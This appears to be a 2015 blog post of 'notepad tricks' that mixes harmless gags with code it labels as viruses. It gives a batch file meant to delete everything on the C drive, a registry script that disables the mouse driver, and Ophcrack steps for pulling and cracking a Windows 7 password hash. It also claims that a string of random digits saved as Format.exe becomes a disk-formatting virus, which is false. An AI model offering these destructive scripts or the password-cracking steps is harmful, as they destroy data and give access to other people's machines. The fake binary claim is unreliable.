Wednesday, 16 December 2015

Create Binary Virus to Format Hard Disk

1. Copy the below codes into Notepad .
0100101100011111001001010101010
1010000011111100000
2. Save the file as Format.exe
3. You just created virus to format Hard
Drive. Enjoy !!!

Hacking Window 7 Password Using Ophcrack

 1. Download Opcrack Live Cd by Clicking
Here.
2. Download windows xp or windows 7 live
cd depending on platform you are wishing to
hack. For example:
Windows 7 or Windows Vista:
Click on ophcrack Vista/7
LiveCD.
Windows XP: Click on ophcrack
XP LiveCD.
2. Now burn the live image on to the cd.
3. Insert the disc into drive and restart you
computer.
  4. If everything goes right you will see
screen like below.
5. After you see screen like above wait for
ophcrack to boot automatically or you may
press Enter to advance.
6. Now you will see several lines of code
printed on screen or they might disappear
very quickly (you dont need to worry about
that).
  7. Then you will see screen like below it is
ophcrack password recovering software. At
the Ophcrack screen it shows the
Administrator and Guest account. Notice the
word “empty ”. This means that if the account
is enabled you could log in without a
password.
  8. Ophcrack WILL NOT CRACK THE
PASSWORD because the hash table which it
needs is not available for free. But it does
show the NTLM hash.
9. Copy this hash value which is under NT
Hash field .
10. Navigate to http://crackstation.net/
which is an online hash cracking tool.
11. Type in the hash value you copied down
in Step 9, Enter the captche and click on
Crack Hashes.

Make A Virus That Disable Mouse

1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE
\system\CurrentControlSet\Services
\Mouclass"
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem ---------------------------------
2. Save this file as virus.bat
3. Done you just created your virus.


Is Your Computer Male Or Female ?

1. Open Notepad and paste the following
codes.
CreateObject("SAPI.SpVoice").Speak"i
love you"
2. Save the file as gender.vbs
3. Now, open the save file
4. If you hear male voice then your
computer is male and if you hear female
voice then its female.

Top 5 best Notepad Tricks

1. World Trade Center Attack Trick

The flight number of the plane that had hit
World Trade Center on (9/11) was Q33NY.
Now we call this trick or a coincidence or
something else but whatever it is you will be
definately amazed by the this trick.
1. Open Notepad and Type
“Q33N ” (without quotes) in capital letters.
2. Increase the font size to 72 .
3. Change the Font to Wingdings.

2. Matrix Effect Trick

In this trick i will show you to make a batch
file in notepad which will act as matrix effect
that you might have seen in movies.Matrix
effect is basically number flashes in green
color.
1. Open Noteapad and copy below code
into it.
@echo off
color 02
:start
echo %random% %random% %random
% %random% %random% %random%
%random% %random% %random%
%random%
goto start
2. Now save this file as Matrix.bat (name
can be anything but .bat is must)
3. Open your saved file and you will have
matrix effect on your screen.

3. Creating Virus That Format C Drive

In this trick we will be creating virus in
notepad using batch file programming. This
virus is really simple to create yet very
dangerous. opening this file we delete or
format C drive of your computer.
1. Open Notepad and copy below code into
it.
@Echo off
Del C:\ *.* |y
2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad

Here you will learn to use notepad as Digital
diary or a log book to keep record of your
daily work instead of using pen and paper.
1. Open Notepad and Type .LOG (in capital
Letters and press enter
2. Save the program with any name and
close it.
3. Open the file again. Now you can see
current date and time, This will happen every
time you reopen notepad

5. Dancing Keyboard Led

In this part i will show you to make
interesting file using notepad which will make
keyboard led to dance. basically we will be
creating a visual basic script.
1. Open Notepad and copy below codes
into it.
Set wshShell =wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as dance.vbs (name
can be anything but .vbs is must)
3. Open your save file and see your
keyboard led blinking like disco lights.